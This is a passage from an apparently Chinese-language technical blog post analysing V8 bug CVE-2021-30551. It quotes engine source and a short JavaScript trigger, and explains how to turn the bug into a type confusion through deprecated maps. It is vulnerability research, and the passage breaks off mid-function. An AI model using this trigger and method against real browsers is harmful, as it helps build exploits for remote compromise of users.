          <span class="k">if</span> <span class="p">(</span><span class="n">result</span><span class="p">.</span><span class="n">IsNothing</span><span class="p">()</span> <span class="o">||</span> <span class="n">result</span><span class="p">.</span><span class="n">FromJust</span><span class="p">())</span> <span class="k">return</span> <span class="n">result</span><span class="p">;</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
          <span class="n">Maybe</span><span class="o">&lt;</span><span class="n">PropertyAttributes</span><span class="o">&gt;</span> <span class="n">maybe_attributes</span> <span class="o">=</span>
              <span class="n">JSObject</span><span class="o">::</span><span class="n">GetPropertyAttributesWithInterceptor</span><span class="p">(</span><span class="n">it</span><span class="p">);</span>
          <span class="k">if</span> <span class="p">(</span><span class="n">maybe_attributes</span><span class="p">.</span><span class="n">IsNothing</span><span class="p">())</span> <span class="k">return</span> <span class="n">Nothing</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span><span class="p">();</span>
          <span class="k">if</span> <span class="p">((</span><span class="n">maybe_attributes</span><span class="p">.</span><span class="n">FromJust</span><span class="p">()</span> <span class="o">&amp;</span> <span class="n">READ_ONLY</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">return</span> <span class="n">WriteToReadOnlyProperty</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">should_throw</span><span class="p">);</span>
          <span class="p">}</span>
          <span class="c1">// &gt;&gt; CVE-2021-30551 的修补位置</span>
          <span class="c1">// At this point we might have called interceptor's query or getter</span>
          <span class="c1">// callback. Assuming that the callbacks have side effects, we use</span>
          <span class="c1">// Object::SetSuperProperty() which works properly regardless on</span>
          <span class="c1">// whether the property was present on the receiver or not when</span>
          <span class="c1">// storing to the receiver.</span>
          <span class="k">if</span> <span class="p">(</span><span class="n">maybe_attributes</span><span class="p">.</span><span class="n">FromJust</span><span class="p">()</span> <span class="o">==</span> <span class="n">ABSENT</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// Proceed lookup from the next state.</span>
            <span class="n">it</span><span class="o">-&gt;</span><span class="n">Next</span><span class="p">();</span>
          <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="c1">// Finish lookup in order to make Object::SetSuperProperty() store</span>
            <span class="c1">// property to the receiver.</span>
            <span class="n">it</span><span class="o">-&gt;</span><span class="n">NotFound</span><span class="p">();</span>
          <span class="p">}</span>
          <span class="k">return</span> <span class="n">Object</span><span class="o">::</span><span class="n">SetSuperProperty</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">store_origin</span><span class="p">,</span>
                                          <span class="n">should_throw</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">break</span><span class="p">;</span>
      <span class="p">}</span>
	  <span class="p">...</span>
    <span class="p">}</span>
    <span class="n">it</span><span class="o">-&gt;</span><span class="n">Next</span><span class="p">();</span>
  <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">IsFound</span><span class="p">());</span>

  <span class="o">*</span><span class="n">found</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
  <span class="k">return</span> <span class="n">Nothing</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="实现利用">实现利用</h2>

<p>距离我实现 CVE-2021-30551 的利用已经过去一段时间了，一些很重要的细节我都已经忘记了，这次就重新实现下漏洞的利用过程，加深印象。</p>

<h3 id="类型混淆">类型混淆</h3>

<p>利用这个漏洞要先将漏洞转换成类型混淆，按照 CVE-2021-30551 的利用思路，通过触发两次漏洞，创建出两个有微妙区别的对象，然后再配合上 JIT 编译生成的代码，就可以把这个漏洞转换成类型混淆。</p>

<p>先触发一次漏洞得到一个具有两个 prop 属性的对象 s1，代码如下：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">s1</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="nx">v1</span> <span class="o">=</span> <span class="p">{</span> <span class="na">toString</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span><span class="nx">s1</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mi">1</span><span class="p">}</span> <span class="p">};</span>
<span class="nx">s1</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="nx">v1</span><span class="p">;</span>
</code></pre></div></div>

<p>之后再一次触发漏洞, 创建一个新对象 s2，不过这次漏洞触发的时候，我们希望能在设置第二个 prop 属性时，在控制流走到 LookupIterator::ApplyTransitionToDataProperty 函数时 <code class="language-plaintext highlighter-rouge">simple_transition</code> 条件为 <code class="language-plaintext highlighter-rouge">false</code>，这样控制流会走到 <code class="language-plaintext highlighter-rouge">ReloadPropertyInformation</code> 函数中，重新在 从对象中搜索 prop 属性的位置存储到 state_ 中，搜索算法是从属性描述符的数组的开头线性搜索，这样搜到的结果就是第一个 prop 属性的描述符，而不是刚刚添加的第二个 prop。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">/// 添加属性的关键函数</span>
<span class="n">Maybe</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span> <span class="n">Object</span><span class="o">::</span><span class="n">AddDataProperty</span><span class="p">(</span><span class="n">LookupIterator</span><span class="o">*</span> <span class="n">it</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">value</span><span class="p">,</span>
                                    <span class="n">PropertyAttributes</span> <span class="n">attributes</span><span class="p">,</span>
                                    <span class="n">Maybe</span><span class="o">&lt;</span><span class="n">ShouldThrow</span><span class="o">&gt;</span> <span class="n">should_throw</span><span class="p">,</span>
                                    <span class="n">StoreOrigin</span> <span class="n">store_origin</span><span class="p">)</span> <span class="p">{</span>
  <span class="p">...</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">IsElement</span><span class="p">(</span><span class="o">*</span><span class="n">receiver</span><span class="p">))</span> <span class="p">{</span>
    <span class="p">...</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
	<span class="c1">/// &lt;&lt;&lt; 这里开始是添加属性的关键点</span>
    <span class="n">it</span><span class="o">-&gt;</span><span class="n">UpdateProtector</span><span class="p">();</span>
    <span class="c1">// Migrate to the most up-to-date map that will be able to store |value|</span>
    <span class="c1">// under it-&gt;name() with |attributes|.</span>
    <span class="c1">/// &lt;&lt;&lt; 这里先准备一个存储了新属性描述符的新 map</span>
    <span class="n">it</span><span class="o">-&gt;</span><span class="n">PrepareTransitionToDataProperty</span><span class="p">(</span><span class="n">receiver</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">attributes</span><span class="p">,</span>
                                        <span class="n">store_origin</span><span class="p">);</span>
    <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">LookupIterator</span><span class="o">::</span><span class="n">TRANSITION</span><span class="p">,</span> <span class="n">it</span><span class="o">-&gt;</span><span class="n">state</span><span class="p">());</span>
    <span class="c1">/// &lt;&lt;&lt; 将新的 map 应用到 receiver 对象</span>
    <span class="n">it</span><span class="o">-&gt;</span><span class="n">ApplyTransitionToDataProperty</span><span class="p">(</span><span class="n">receiver</span><span class="p">);</span>

    <span class="c1">// Write the property value.</span>
    <span class="c1">/// &lt;&lt;&lt; 将属性值写入 receiver 对象</span>
    <span class="n">it</span><span class="o">-&gt;</span><span class="n">WriteDataValue</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
	<span class="p">...</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">Just</span><span class="p">(</span><span class="nb">true</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">LookupIterator</span><span class="o">::</span><span class="n">ApplyTransitionToDataProperty</span><span class="p">(</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSReceiver</span><span class="o">&gt;</span> <span class="n">receiver</span><span class="p">)</span> <span class="p">{</span>
  <span class="p">...</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">transition</span> <span class="o">=</span> <span class="n">transition_map</span><span class="p">();</span>
  <span class="kt">bool</span> <span class="n">simple_transition</span> <span class="o">=</span> <span class="c1">// &lt;&lt;&lt;&lt;&lt; 关键点1</span>
      <span class="n">transition</span><span class="o">-&gt;</span><span class="n">GetBackPointer</span><span class="p">(</span><span class="n">isolate_</span><span class="p">)</span> <span class="o">==</span> <span class="n">receiver</span><span class="o">-&gt;</span><span class="n">map</span><span class="p">(</span><span class="n">isolate_</span><span class="p">);</span>

  <span class="p">...</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">simple_transition</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">number_</span> <span class="o">=</span> <span class="n">transition</span><span class="o">-&gt;</span><span class="n">LastAdded</span><span class="p">();</span>
    <span class="n">property_details_</span> <span class="o">=</span> <span class="n">transition</span><span class="o">-&gt;</span><span class="n">GetLastDescriptorDetails</span><span class="p">(</span><span class="n">isolate_</span><span class="p">);</span>
    <span class="n">state_</span> <span class="o">=</span> <span class="n">DATA</span><span class="p">;</span>
  <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">receiver</span><span class="o">-&gt;</span><span class="n">map</span><span class="p">(</span><span class="n">isolate_</span><span class="p">).</span><span class="n">is_dictionary_map</span><span class="p">())</span> <span class="p">{</span>
	<span class="p">...</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">ReloadPropertyInformation</span><span class="o">&lt;</span><span class="nb">false</span><span class="o">&gt;</span><span class="p">();</span> <span class="c1">// &lt;&lt;&lt;&lt;&lt; 关键点2</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="k">template</span> <span class="o">&lt;</span><span class="kt">bool</span> <span class="n">is_element</span><span class="p">&gt;</span>
<span class="kt">void</span> <span class="n">LookupIterator</span><span class="o">::</span><span class="n">ReloadPropertyInformation</span><span class="p">()</span> <span class="p">{</span>
  <span class="n">state_</span> <span class="o">=</span> <span class="n">BEFORE_PROPERTY</span><span class="p">;</span>
  <span class="n">interceptor_state_</span> <span class="o">=</span> <span class="n">InterceptorState</span><span class="o">::</span><span class="n">kUninitialized</span><span class="p">;</span>
  <span class="n">state_</span> <span class="o">=</span> <span class="n">LookupInHolder</span><span class="o">&lt;</span><span class="n">is_element</span><span class="o">&gt;</span><span class="p">(</span><span class="n">holder_</span><span class="o">-&gt;</span><span class="n">map</span><span class="p">(</span><span class="n">isolate_</span><span class="p">),</span> <span class="o">*</span><span class="n">holder_</span><span class="p">);</span> <span class="c1">// &lt;&lt;&lt; 关键点3</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="n">IsFound</span><span class="p">()</span> <span class="o">||</span> <span class="o">!</span><span class="n">holder_</span><span class="o">-&gt;</span><span class="n">HasFastProperties</span><span class="p">(</span><span class="n">isolate_</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>

<p>这样一来程序运行 WriteDataValue 函数时，就会到的用第一个属性的描述符和第二个属性的值作为参数调用 WriteToField 函数。由于正常情况下，这里描述符存和值的类型时匹配的，在 WriteToField 函数中不会严格的校验 value 是否和描述符指定的类型匹配，有几处强制类型转换操作，我们利用这点来实现漏洞的利用。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">LookupIterator</span><span class="o">::</span><span class="n">WriteDataValue</span><span class="p">(</span><span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">value</span><span class="p">,</span>
                                    <span class="kt">bool</span> <span class="n">initializing_store</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">DATA</span><span class="p">,</span> <span class="n">state_</span><span class="p">);</span>
<span class="cp">#if V8_ENABLE_WEBASSEMBLY
</span>  <span class="c1">// WriteDataValueToWasmObject() must be used instead for writing to</span>
  <span class="c1">// WasmObjects.</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="o">!</span><span class="n">holder_</span><span class="o">-&gt;</span><span class="n">IsWasmObject</span><span class="p">(</span><span class="n">isolate_</span><span class="p">));</span>
<span class="cp">#endif  // V8_ENABLE_WEBASSEMBLY
</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSReceiver</span><span class="o">&gt;</span> <span class="n">holder</span> <span class="o">=</span> <span class="n">GetHolder</span><span class="o">&lt;</span><span class="n">JSReceiver</span><span class="o">&gt;</span><span class="p">();</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">IsElement</span><span class="p">(</span><span class="o">*</span><span class="n">holder</span><span class="p">))</span> <span class="p">{</span>
	<span class="p">...</span>
  <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">holder</span><span class="o">-&gt;</span><span class="n">HasFastProperties</span><span class="p">(</span><span class="n">isolate_</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">DCHECK</span><span class="p">(</span><span class="n">holder</span><span class="o">-&gt;</span><span class="n">IsJSObject</span><span class="p">(</span><span class="n">isolate_</span><span class="p">));</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">property_details_</span><span class="p">.</span><span class="n">location</span><span class="p">()</span> <span class="o">==</span> <span class="n">PropertyLocation</span><span class="o">::</span><span class="n">kField</span><span class="p">)</span> <span class="p">{</span>
      <span class="c1">// Check that in case of VariableMode::kConst field the existing value is</span>
      <span class="c1">// equal to |value|.</span>
      <span class="n">DCHECK_IMPLIES</span><span class="p">(</span><span class="o">!</span><span class="n">initializing_store</span> <span class="o">&amp;&amp;</span> <span class="n">property_details_</span><span class="p">.</span><span class="n">constness</span><span class="p">()</span> <span class="o">==</span>
                                                <span class="n">PropertyConstness</span><span class="o">::</span><span class="n">kConst</span><span class="p">,</span>
                     <span class="n">IsConstFieldValueEqualTo</span><span class="p">(</span><span class="o">*</span><span class="n">value</span><span class="p">));</span>
      <span class="n">JSObject</span><span class="o">::</span><span class="n">cast</span><span class="p">(</span><span class="o">*</span><span class="n">holder</span><span class="p">).</span><span class="n">WriteToField</span><span class="p">(</span><span class="n">descriptor_number</span><span class="p">(),</span>
                                           <span class="n">property_details_</span><span class="p">,</span> <span class="o">*</span><span class="n">value</span><span class="p">);</span> <span class="c1">/// &lt;&lt;&lt; 关键点</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="p">...</span>
    <span class="p">}</span>
  <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">holder</span><span class="o">-&gt;</span><span class="n">IsJSGlobalObject</span><span class="p">(</span><span class="n">isolate_</span><span class="p">))</span> <span class="p">{</span>
	<span class="p">...</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
	<span class="p">...</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">JSObject</span><span class="o">::</span><span class="n">WriteToField</span><span class="p">(</span><span class="n">InternalIndex</span> <span class="n">descriptor</span><span class="p">,</span> <span class="n">PropertyDetails</span> <span class="n">details</span><span class="p">,</span>
                            <span class="n">Object</span> <span class="n">value</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">PropertyLocation</span><span class="o">::</span><span class="n">kField</span><span class="p">,</span> <span class="n">details</span><span class="p">.</span><span class="n">location</span><span class="p">());</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">PropertyKind</span><span class="o">::</span><span class="n">kData</span><span class="p">,</span> <span class="n">details</span><span class="p">.</span><span class="n">kind</span><span class="p">());</span>
  <span class="n">DisallowGarbageCollection</span> <span class="n">no_gc</span><span class="p">;</span>
  <span class="n">FieldIndex</span> <span class="n">index</span> <span class="o">=</span> <span class="n">FieldIndex</span><span class="o">::</span><span class="n">ForDescriptor</span><span class="p">(</span><span class="n">map</span><span class="p">(),</span> <span class="n">descriptor</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">details</span><span class="p">.</span><span class="n">representation</span><span class="p">().</span><span class="n">IsDouble</span><span class="p">())</span> <span class="p">{</span>
    <span class="c1">// Manipulating the signaling NaN used for the hole and uninitialized</span>
    <span class="c1">// double field sentinel in C++, e.g. with bit_cast or value()/set_value(),</span>
    <span class="c1">// will change its value on ia32 (the x87 stack is used to return values</span>
    <span class="c1">// and stores to the stack silently clear the signalling bit).</span>
    <span class="kt">uint64_t</span> <span class="n">bits</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">value</span><span class="p">.</span><span class="n">IsSmi</span><span class="p">())</span> <span class="p">{</span>
      <span class="n">bits</span> <span class="o">=</span> <span class="n">bit_cast</span><span class="o">&lt;</span><span class="kt">uint64_t</span><span class="o">&gt;</span><span class="p">(</span><span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">double</span><span class="o">&gt;</span><span class="p">(</span><span class="n">Smi</span><span class="o">::</span><span class="n">ToInt</span><span class="p">(</span><span class="n">value</span><span class="p">)));</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">value</span><span class="p">.</span><span class="n">IsUninitialized</span><span class="p">())</span> <span class="p">{</span>
      <span class="n">bits</span> <span class="o">=</span> <span class="n">kHoleNanInt64</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
      <span class="n">DCHECK</span><span class="p">(</span><span class="n">value</span><span class="p">.</span><span class="n">IsHeapNumber</span><span class="p">());</span> <span class="c1">/// DCHECK 是类似 assert 的操作，发布版不生效</span>
      <span class="n">bits</span> <span class="o">=</span> <span class="n">HeapNumber</span><span class="o">::</span><span class="n">cast</span><span class="p">(</span><span class="n">value</span><span class="p">).</span><span class="n">value_as_bits</span><span class="p">(</span><span class="n">kRelaxedLoad</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">auto</span> <span class="n">box</span> <span class="o">=</span> <span class="n">HeapNumber</span><span class="o">::</span><span class="n">cast</span><span class="p">(</span><span class="n">RawFastPropertyAt</span><span class="p">(</span><span class="n">index</span><span class="p">));</span>
    <span class="n">box</span><span class="p">.</span><span class="n">set_value_as_bits</span><span class="p">(</span><span class="n">bits</span><span class="p">,</span> <span class="n">kRelaxedStore</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">FastPropertyAtPut</span><span class="p">(</span><span class="n">index</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>从 LookupIterator::ApplyTransitionToDataProperty 函数可以看到当 simple_transition 为 false， 也就是 transition map 的父 map，不是当前 receiver 的 map 时，程序才会走到上面所说的可利用的控制流上，那么怎么才能触发这个条件呢？这就需要看 transition map 的创建过程了，如果单步调试过这一段流程，可以知道 transition map 是在之前的 LookupIterator::PrepareTransitionToDataProperty -&gt; Map::TransitionToDataProperty 这一段控制流中创建的。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">LookupIterator</span><span class="o">::</span><span class="n">PrepareTransitionToDataProperty</span><span class="p">(</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSReceiver</span><span class="o">&gt;</span> <span class="n">receiver</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">value</span><span class="p">,</span>
    <span class="n">PropertyAttributes</span> <span class="n">attributes</span><span class="p">,</span> <span class="n">StoreOrigin</span> <span class="n">store_origin</span><span class="p">)</span> <span class="p">{</span>

  <span class="p">...</span>
  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">map</span><span class="p">(</span><span class="n">receiver</span><span class="o">-&gt;</span><span class="n">map</span><span class="p">(</span><span class="n">isolate_</span><span class="p">),</span> <span class="n">isolate_</span><span class="p">);</span>

  <span class="p">...</span>

  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">transition</span> <span class="o">=</span>
      <span class="n">Map</span><span class="o">::</span><span class="n">TransitionToDataProperty</span><span class="p">(</span><span class="n">isolate_</span><span class="p">,</span> <span class="n">map</span><span class="p">,</span> <span class="n">name_</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">attributes</span><span class="p">,</span>
                                    <span class="n">PropertyConstness</span><span class="o">::</span><span class="n">kConst</span><span class="p">,</span> <span class="n">store_origin</span><span class="p">);</span>
  <span class="n">state_</span> <span class="o">=</span> <span class="n">TRANSITION</span><span class="p">;</span>
  <span class="n">transition_</span> <span class="o">=</span> <span class="n">transition</span><span class="p">;</span>
  <span class="p">...</span>
<span class="p">}</span>

<span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">Map</span><span class="o">::</span><span class="n">TransitionToDataProperty</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">map</span><span class="p">,</span>
                                          <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Name</span><span class="o">&gt;</span> <span class="n">name</span><span class="p">,</span>
                                          <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">value</span><span class="p">,</span>
                                          <span class="n">PropertyAttributes</span> <span class="n">attributes</span><span class="p">,</span>
                                          <span class="n">PropertyConstness</span> <span class="n">constness</span><span class="p">,</span>
                                          <span class="n">StoreOrigin</span> <span class="n">store_origin</span><span class="p">)</span> <span class="p">{</span>
  <span class="p">...</span>

  <span class="c1">// Migrate to the newest map before storing the property.</span>
  <span class="n">map</span> <span class="o">=</span> <span class="n">Update</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">map</span><span class="p">);</span>

  <span class="n">Map</span> <span class="n">maybe_transition</span> <span class="o">=</span>
      <span class="n">TransitionsAccessor</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">map</span><span class="p">)</span>
          <span class="p">.</span><span class="n">SearchTransition</span><span class="p">(</span><span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="n">PropertyKind</span><span class="o">::</span><span class="n">kData</span><span class="p">,</span> <span class="n">attributes</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">maybe_transition</span><span class="p">.</span><span class="n">is_null</span><span class="p">())</span> <span class="p">{</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">transition</span><span class="p">(</span><span class="n">maybe_transition</span><span class="p">,</span> <span class="n">isolate</span><span class="p">);</span>
    <span class="n">InternalIndex</span> <span class="n">descriptor</span> <span class="o">=</span> <span class="n">transition</span><span class="o">-&gt;</span><span class="n">LastAdded</span><span class="p">();</span>

    <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">attributes</span><span class="p">,</span> <span class="n">transition</span><span class="o">-&gt;</span><span class="n">instance_descriptors</span><span class="p">(</span><span class="n">isolate</span><span class="p">)</span>
                              <span class="p">.</span><span class="n">GetDetails</span><span class="p">(</span><span class="n">descriptor</span><span class="p">)</span>
                              <span class="p">.</span><span class="n">attributes</span><span class="p">());</span>

    <span class="k">return</span> <span class="n">UpdateDescriptorForValue</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">transition</span><span class="p">,</span> <span class="n">descriptor</span><span class="p">,</span> <span class="n">constness</span><span class="p">,</span>
                                    <span class="n">value</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="c1">// Do not track transitions during bootstrapping.</span>
  <span class="n">TransitionFlag</span> <span class="n">flag</span> <span class="o">=</span>
      <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">bootstrapper</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">IsActive</span><span class="p">()</span> <span class="o">?</span> <span class="n">OMIT_TRANSITION</span> <span class="o">:</span> <span class="n">INSERT_TRANSITION</span><span class="p">;</span>
  <span class="n">MaybeHandle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">maybe_map</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">map</span><span class="o">-&gt;</span><span class="n">TooManyFastProperties</span><span class="p">(</span><span class="n">store_origin</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">Representation</span> <span class="n">representation</span> <span class="o">=</span> <span class="n">value</span><span class="o">-&gt;</span><span class="n">OptimalRepresentation</span><span class="p">(</span><span class="n">isolate</span><span class="p">);</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">FieldType</span><span class="o">&gt;</span> <span class="n">type</span> <span class="o">=</span> <span class="n">value</span><span class="o">-&gt;</span><span class="n">OptimalType</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">representation</span><span class="p">);</span>
    <span class="n">maybe_map</span> <span class="o">=</span> <span class="n">Map</span><span class="o">::</span><span class="n">CopyWithField</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">map</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">type</span><span class="p">,</span> <span class="n">attributes</span><span class="p">,</span>
                                   <span class="n">constness</span><span class="p">,</span> <span class="n">representation</span><span class="p">,</span> <span class="n">flag</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">result</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">maybe_map</span><span class="p">.</span><span class="n">ToHandle</span><span class="p">(</span><span class="o">&amp;</span><span class="n">result</span><span class="p">))</span> <span class="p">{</span>
      <span class="p">...</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
      <span class="n">result</span> <span class="o">=</span> <span class="n">Map</span><span class="o">::</span><span class="n">Normalize</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">map</span><span class="p">,</span> <span class="n">CLEAR_INOBJECT_PROPERTIES</span><span class="p">,</span> <span class="n">reason</span><span class="p">);</span>
    <span class="p">}</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">result</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">Map</span><span class="o">::</span><span class="n">Update</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Map</span><span class="o">&gt;</span> <span class="n">map</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">map</span><span class="o">-&gt;</span><span class="n">is_deprecated</span><span class="p">())</span> <span class="k">return</span> <span class="n">map</span><span class="p">;</span>
  <span class="p">...</span>
  <span class="n">MapUpdater</span> <span class="n">mu</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">map</span><span class="p">);</span>
  <span class="k">return</span> <span class="n">mu</span><span class="p">.</span><span class="n">Update</span><span class="p">();</span>
<span class="p">}</span>

</code></pre></div></div>

<p>结合代码可知一般情况下，transition map 的创建动作，就是先拷贝一份 receiver 的 map ，再追加上新属性的属性描述符。但是如果当前 receiver 的 map 已经被打上了 deprecated 标记了，情况就有所不同，这种情况下 receiver 现有的 map 已经废弃了，要先用 MapUpdater 寻找/创建一个更合适的 map 作为 transition map 的父 map，这样一来 transition 的父 map 就不是 receiver 原本的 map（MapUpdater 并不会更新 receiver 的 map），最终导致 simple_transition 为 false。</p>

<p>那么问题就又变成了，怎么才能让 receiver 的 map 被打上 deprecated 标记呢？先在代码里搜索一下看看哪里会修改 map 的 deprecated 字段。查看 is_deprecated 的函数定义可以得知，函数是用 BIT_FIELD_ACCESSORS 宏定义的，这个宏还定义了修改函数 set_is_deprecated，搜索 set_is_deprecated 字符串发现函数 Map::DeprecateTransitionTree 中有调用，再搜索 DeprecateTransitionTree 的调用，可以搜到 MapUpdater::ConstructNewMap，再向上搜索找到 MapUpdater::ReconfigureToDataField、MapUpdater::ReconfigureElementsKind。通过分析这两个函数的定义和引用的地方，结合 CVE-2021-30551 的 POC 可以推测出，这两个函数是在修改对象已有属性类型、数组元素类型时触发的，CVE-2021-30551 采用的是触发 ReconfigureToDataField 这条代码路径 SetPropertyInternal -&gt; PrepareForDataProperty -&gt; PrepareForDataProperty -&gt; UpdateDescriptorForValue -&gt; ReconfigureToDataField。（另一条路径是否可行?）</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">Map</span><span class="o">::</span><span class="n">DeprecateTransitionTree</span><span class="p">(</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">is_deprecated</span><span class="p">())</span> <span class="k">return</span><span class="p">;</span>
  <span class="n">DisallowGarbageCollection</span> <span class="n">no_gc</span><span class="p">;</span>
